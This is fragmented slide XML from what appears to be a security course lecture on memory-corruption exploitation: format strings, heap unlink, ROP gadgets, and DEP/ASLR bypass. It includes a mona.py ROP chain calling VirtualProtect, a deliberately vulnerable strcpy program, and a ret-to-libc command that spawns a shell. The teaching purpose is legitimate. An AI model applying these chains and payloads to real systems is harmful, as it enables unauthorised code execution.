                  <a:pt y="46077" x="45720"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="47386" x="63400"/>
                  <a:pt y="44767" x="90249"/>
                  <a:pt y="38933" x="106085"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="33099" x="121920"/>
                  <a:pt y="17561" x="126325"/>
                  <a:pt y="11073" x="140732"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="4584" x="155138"/>
                  <a:pt y="1845" x="183892"/>
                  <a:pt y="0" x="19252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y="1730374" x="457200"/>
            <a:ext cy="4837499" cx="526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0x740109FC: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 edi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pop ebp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723" name="Shape 723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1466111" x="5666046"/>
            <a:ext cy="5544599" cx="3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&amp;Function 2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</a:rPr>
              <a:t>...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724" name="Shape 724"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3036100" x="1669850"/>
            <a:ext cy="1162150" cx="4813100"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="192524" extrusionOk="0" h="46486">
                <a:moveTo>
                  <a:pt y="31075" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="33575" x="7620"/>
                  <a:pt y="44767" x="28039"/>
                  <a:pt y="46077" x="45720"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="47386" x="63400"/>
                  <a:pt y="44767" x="90249"/>
                  <a:pt y="38933" x="106085"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="33099" x="121920"/>
                  <a:pt y="17561" x="126325"/>
                  <a:pt y="11073" x="140732"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="4584" x="155138"/>
                  <a:pt y="1845" x="183892"/>
                  <a:pt y="0" x="19252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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="725" name="Shape 725"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4634500" x="1910950"/>
            <a:ext cy="1384200" cx="318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so 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Format string bugs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%n allows us to write an arbitrary DWORD (32 bits) to an arbitrary address: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y="2959775" x="618750"/>
            <a:ext cy="1433400" cx="2918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NTDLL.dll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y="3454775" x="1175650"/>
            <a:ext cy="845699" cx="2274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pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3501275" x="6419697"/>
            <a:ext cy="752700" cx="2160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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="311" name="Shape 311"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="309" idx="0"/>
            <a:endCxn id="310" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3877624" x="3449650"/>
            <a:ext cy="0" cx="297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312" name="Shape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4712375" x="618750"/>
            <a:ext cy="1433400" cx="2918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Linux binary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y="5207375" x="1175650"/>
            <a:ext cy="845699" cx="2274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GOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5253875" x="6419697"/>
            <a:ext cy="752700" cx="2160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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="315" name="Shape 315"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="313" idx="0"/>
            <a:endCxn id="314" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5630224" x="3449650"/>
            <a:ext cy="0" cx="297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y="1730374" x="457200"/>
            <a:ext cy="4837499" cx="866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Basically a combination of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return-to-libc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return chaining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Was used by malware to disable DEP on windows XP SP2 and Vista SP0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NtSetInformationProcess(-1, 34, &amp;2, 4)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http://www.uninformed.org/?v=2&amp;a=4&amp;t=txt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XP SP3, Vista SP1 and Windows 7 responded with "Permanent DEP"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SetProcessDEPPolicy(PROCESS_DEP_ENABLE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="18288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applications have to OPT in for this feature though</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="4" indent="-342900" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>defenses off by default?  Haha!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defenses evolved to mitigate early ROP attacks.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Attackers evolved their techniques as well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1" name="Shape 7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y="1730374" x="457200"/>
            <a:ext cy="4837499" cx="618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Instead of returning to functions,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return to instruction sequences followed by a RET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return into the middle of existing functions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/>
              <a:t>Can return into the middle of existing instruction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Attacker just needs usable byte sequences that represent valid instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Shape 744"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3357575" x="6714525"/>
            <a:ext cy="473400" cx="1964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B8 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89  41  08  C3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y="2518175" x="6415997"/>
            <a:ext cy="651899" cx="220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eax, 0xc3084189</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Shape 746"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2937875" x="6724050"/>
            <a:ext cy="446475" cx="1986871"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="73581" extrusionOk="0" h="17859">
                <a:moveTo>
                  <a:pt y="17145" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="10001" x="7858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="12858" x="33576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="0" x="35719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="12858" x="36791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="10715" x="70009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="17859" x="73581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747" name="Shape 747"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3866550" x="7170550"/>
            <a:ext cy="375050" cx="1410875"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="56435" extrusionOk="0" h="15002">
                <a:moveTo>
                  <a:pt y="0" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="9644" x="7858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="8216" x="24288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="15002" x="26431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="8216" x="27146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="10716" x="51077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="357" x="56435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748" name="Shape 748"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4161225" x="7108025"/>
            <a:ext cy="723299" cx="197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 [ecx+8], eax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y="1730374" x="457200"/>
            <a:ext cy="4837499" cx="605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You can find these useful little things all over memory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code-reuse, level up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 the terminology of ROP, these are called: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i="1"/>
              <a:t>gadgets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="755" name="Shape 755"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3357575" x="6714525"/>
            <a:ext cy="473400" cx="1964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B8 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89  41  08  C3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y="2518175" x="6415997"/>
            <a:ext cy="651899" cx="220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eax, 0xc3084189</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Shape 757"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2937875" x="6724050"/>
            <a:ext cy="446475" cx="1986871"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="73581" extrusionOk="0" h="17859">
                <a:moveTo>
                  <a:pt y="17145" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="10001" x="7858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="12858" x="33576"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="0" x="35719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="12858" x="36791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="10715" x="70009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="17859" x="73581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758" name="Shape 758"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3866550" x="7170550"/>
            <a:ext cy="375050" cx="1410875"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="56435" extrusionOk="0" h="15002">
                <a:moveTo>
                  <a:pt y="0" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="9644" x="7858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="8216" x="24288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="15002" x="26431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="8216" x="27146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="10716" x="51077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="357" x="56435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759" name="Shape 759"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4161225" x="7108025"/>
            <a:ext cy="723299" cx="197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 [ecx+8], eax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3" name="Shape 7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Gadgets</a:t>
            </a:r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various instruction sequences / byte sequences can be combined to form gadgets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gadgets perform a higher level function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POP EAX</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2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RET</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr sz="2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POP ECX</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2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RET</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2400" lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr sz="2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mov [ecx], eax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y="3268275" x="3652250"/>
            <a:ext cy="2911075" cx="1223350"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="48934" extrusionOk="0" h="116443">
                <a:moveTo>
                  <a:pt y="0" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="16787" x="29646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="50006" x="22860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="57150" x="48934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="66079" x="25360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="108585" x="30003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="116443" x="1071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767" name="Shape 767"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4153500" x="4884550"/>
            <a:ext cy="1250100" cx="336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store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immediate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value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gadget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Gadgets</a:t>
            </a:r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Scan executable memory regions of commonly shared libraries for instruction sequences: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useful instruction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Chain the returns to identified sequences to form all the desired gadgets to form a Turing-complete gadget catalog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7" name="Shape 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Turing Completeness</a:t>
            </a:r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system of data-manipulation rules is said to be "Turing Complete" if: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it can be used to simulate ANY single-taped Turing machine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common criteria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conditional branching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ability to modify arbitrary memory locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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3" name="Shape 7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Gadgets</a:t>
            </a:r>
          </a:p>
        </p:txBody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Can be difficult to work with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still have to avoid nullbytes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Just like ASCII shellcode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 ROP catalogue can be seen as a </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en" i="1"/>
              <a:t>instruction set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So ROP Gadget-catalogues are used to build exploit compilers / assemblers!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Gadgets Compilers</a:t>
            </a:r>
          </a:p>
        </p:txBody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gadgets can be used as a backend to a C/C++ compiler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Hovav Shacham's initial paper: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http://cseweb.ucsd.edu/~hovav/dist/geometry.pdf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Return-Oriented quicksort!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https://github.com/pakt/ropc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http://users.ece.cmu.edu/~ejschwar/bib/schwartz_2011_rop-abstract.html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http://www.ieee-security.org/TC/SP2012/papers/4681a571.pdf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Oriented Exploits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~2010</a:t>
            </a:r>
          </a:p>
        </p:txBody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Main thing attacker wants to defeat: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DEP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needs to execute malicious input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Many exploits are multi-staged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Defeat DEP with ROP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execute traditional payload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8" name="Shape 7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3781729" x="7086359"/>
            <a:ext cy="3076270" cx="204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Heap overflows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Generic heap unlink exploitation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generic linked list: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BK = P-&gt;bk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FD = P-&gt;fd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FD-&gt; bk = BK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BK-&gt;fd = FD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5351200" x="773450"/>
            <a:ext cy="752700" cx="6089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Buffer	on	heap	          next heap block header	fd		bk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y="5351200" x="5127175"/>
            <a:ext cy="763200" cx="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4" name="Shape 324"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5351200" x="5965375"/>
            <a:ext cy="763200" cx="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25" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2959775" x="2892150"/>
            <a:ext cy="1433400" cx="3490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kernel32.dll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6" name="Shape 326"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5351200" x="2764975"/>
            <a:ext cy="763200" cx="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27" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3991050" x="3506350"/>
            <a:ext cy="1567550" cx="1990375"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="79615" extrusionOk="0" h="62702">
                <a:moveTo>
                  <a:pt y="62702" x="79615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="43314" x="70539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="40426" x="19388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="26401" x="412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="2887" x="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="0" x="13613"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:cu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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3728074" x="3815725"/>
            <a:ext cy="489899" cx="2274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pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Shape 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3501275" x="7181697"/>
            <a:ext cy="752700" cx="1309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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="328" idx="0"/>
            <a:endCxn id="329" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3877624" x="6089725"/>
            <a:ext cy="95400" cx="109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331" name="Shape 331"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="322" idx="3"/>
            <a:endCxn id="329" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="4253950" x="6863150"/>
            <a:ext cy="1473600" cx="97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332" name="Shape 332"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6393925" x="732200"/>
            <a:ext cy="0" cx="61052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3" name="Shape 333"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6070225" x="742525"/>
            <a:ext cy="237299" cx="269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buffer overflow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Oriented Exploits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~2010</a:t>
            </a:r>
          </a:p>
        </p:txBody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DEP does not prevent the allocation of more memory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HEAP_CREATE_ENABLE_EXECUTE method </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="800" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>(http://www.immunitysec.com/downloads/DEPLIB.pdf)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VirtualAlloc() method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200000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://blip.tv/source-boston-2010/dino-dai-zovi-practical-return-oriented-programming-3583429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VirtualProtect(ESP) method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just makes the stack executable again!  haha!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VirtualProtect(ESP+offset &amp; (4096 - 1), </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="18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dwPayloadSize, PAGE_EXECUTE_READWRITE); //make executable</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="18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(*ESP+offset)();  // jump to target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200000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://blip.tv/source-boston-2010/dino-dai-zovi-practical-return-oriented-programming-3583429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8" name="Shape 8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9" name="Shape 80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Return Oriented Exploits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~2013</a:t>
            </a:r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DEP + ASLR is common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makes ROP very difficult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no idea where things are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u="sng" b="1" lang="en"/>
              <a:t>requires address disclosure vulnerabilities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however modules have to OPT into DEP + ASLR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if a .dll doesn't use DEP or ALSR, then can still ROP easily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***DEP + ALSR can be completely disabled on smartphone ROMs, and jailbroken smartphones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4" name="Shape 8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5" name="Shape 81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Return Oriented Exploits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~2013</a:t>
            </a:r>
          </a:p>
        </p:txBody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There are databases of ROP gadget chains now a days.  They work on most platforms, and exploit common .dll's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https://www.corelan.be/index.php/security/corelan-ropdb/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https://community.rapid7.com/community/metasploit/blog/2012/10/03/defeat-the-hard-and-strong-with-the-soft-and-gentle-metasploit-ropdb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ROP chain</a:t>
            </a:r>
          </a:p>
        </p:txBody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rop_gadgets =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0x7c37653d, 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POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN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0xfffffdff,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Value to negate, will become 0x00000201 (dwSize)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0x7c347f98,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RETN (ROP NOP) [msvcr71.dll]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0x7c3415a2,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JMP [EAX] [msvcr71.dll]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0xffffffff,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0x7c376402,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skip 4 bytes [msvcr71.dll]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0x7c351e05,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NEG EAX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0x7c345255,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INC EBX # FPATAN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0x7c352174,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ADD EBX,EAX # XOR EAX,EAX # INC EAX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0x7c344f87,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POP EDX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0xffffffc0,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Value to negate, will become 0x00000040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0x7c351eb1,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NEG EDX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0x7c34d201,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POP ECX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0x7c38b001,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&amp;Writable location [msvcr71.dll]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0x7c347f97,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POP EAX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0x7c37a151,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ptr to &amp;VirtualProtect() - 0x0EF [IAT msvcr71.dll]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0x7c378c81,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PUSHAD # ADD AL,0EF # RETN [msvcr71.dll] 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0x7c345c30,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ptr to 'push esp #  ret ' [msvcr71.dll]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400" lang="en">
                <a:solidFill>
                  <a:srgbClr val="D7DF01"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t># rop chain generated with mona.py</a:t>
            </a:r>
            <a:b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1400" lang="en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].pack("V*")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</a:t>
            </a:r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CDECL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Will have to clean up your arguments on the stack, or skip over them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gadgets that do pop pop pop ret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STDCALL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called function will do clean up for you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gadgets not necessary for clean up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no POP RET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makes life simple!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2" name="Shape 8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3" name="Shape 83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Conclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody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return oriented payload stage can be developed to bypass Permanent DEP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Bypassing DEP under ASLR requires at least ONE non-ASLR module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Bypassing DEP under full ASLR requires an executable memory address disclosure vulnerability + memory corruption vulnerability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8" name="Shape 8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Conclusion</a:t>
            </a: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Key lesson: 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Preventing the introduction of malicious code, is NOT enough for preventing the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution of malicious computations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4" name="Shape 8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5" name="Shape 84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Exploitation Difficulty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7" name="Shape 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2924" x="564900"/>
            <a:ext cy="5314950" cx="78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Shape 848"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1361275" x="2041925"/>
            <a:ext cy="680699" cx="587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u="sng" sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.trailofbits.com/resources/the_future_of_exploitation_slides.pdf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2" name="Shape 8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ROP Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody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gentle introduction to ROP:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr u="sng" sz="1400" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/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Practical Return Oriented Programming: </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1400" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://blip.tv/source-boston-2010/dino-dai-zovi-practical-return-oriented-programming-3583429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ROP tutorials:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr u="sng" sz="1400" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/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6"/>
              </a:rPr>
              <a:t>http://fumalwareanalysis.blogspot.com/2012/02/malware-analysis-tutorial-16-return.html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ROP Database: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7"/>
              </a:rPr>
              <a:t>https://www.corelan.be/index.php/security/corelan-ropdb/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READING</a:t>
            </a:r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Reading: The ROPC (part 1) blog post here: </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="3600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http://gdtr.wordpress.com/2013/12/13/ropc-turing-complete-rop-compiler-part-1/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 that attackers relied on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Fixed addrs of stack &amp; executables segments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changed with ASLR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Function pointers at well-known locations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common targets for arbitrary memory writes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GOT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Heap allocation that trusts the heap metadata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allows for generic ways to turn heap overflows into arbitrary memory writes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Executable data on stack and heap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changed with NX &amp; DEP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4" name="Shape 8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867" name="Shape 8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104" x="488582"/>
            <a:ext cy="5194672" cx="816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2" name="Shape 872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 #2 walkthrough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="873" name="Shape 873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ret to lib c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7" name="Shape 8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8" name="Shape 87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vuln.c</a:t>
            </a:r>
          </a:p>
        </p:txBody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Provided by the HAOE book.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Really simple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main(int argc, char *argv[])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buffer[5];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strcpy(buffer, argv[1]);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0;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We're going to demonstrate return to libc with this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getenvaddr.c</a:t>
            </a:r>
          </a:p>
        </p:txBody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Provided by the HAOE book.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Lets you find where on the stack an env variable is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We're going to use it to find our "    /bin/sh" string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int main(int argc, char *argv[]){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char *ptr;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if(argc &lt; 3) {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	printf("Usage: %s &lt;environment variable&gt; &lt;target program&gt;, argv[0]);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	exit(0);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}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ptr = getenv(arg[1]); /*get env var location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ptr += (strlen(argv[0] - strlen(argv[2]))*2; /*adjust for program name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printf ("%s will be at %p\n", arg[1], ptr);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0" name="Shape 89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we need to do</a:t>
            </a:r>
          </a:p>
        </p:txBody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Find the address of system()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Find the address of exit()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en"/>
              <a:t>if we want it to be clean (will seg fault otherwise)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LcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>seg faults can leave logs!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Find the address of "    /bin/sh" on the stack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en"/>
              <a:t>we're going to do this to put it in the environmental variables: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romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>export BINSH="    /bin/sh"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Locate the RET value on the vulnerable program's stack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5" name="Shape 8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6" name="Shape 89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Find system() and exit()</a:t>
            </a:r>
          </a:p>
        </p:txBody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 main(){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system();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exit();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Use GDB to find their addresses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1" name="Shape 9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2" name="Shape 90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Have all the addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody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system = 0xb7ed0d80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exit = 0xb7ec68f0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pointer to "/bin/sh" = 0xbffffe5d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These may differ for you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Now to find the RET value on the stack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can do it by binary fuzzing, or examining the stack values with GDB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7" name="Shape 9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8" name="Shape 90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ret-to-libc exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody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y="1704688" x="152400"/>
            <a:ext cy="4840199" cx="874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$ ./vuln $(perl -e 'print "ABCD"x7 . '\x80\x0d\xed\xb7\xf0\x68\xec\xb7\x5b\xfe\xff\xbf"')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Should give us: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sh-3.2#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Times changed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Windows XP SP 2 (August 2004)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Non executable heap and stack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stack cookies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safe unlinking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PEB randomization (ASLR)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Red Hat Enterprise Linux 3 Update 3 (sept 2004)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non executable heap and stack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randomization of library load-in locations in process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ASLR just for libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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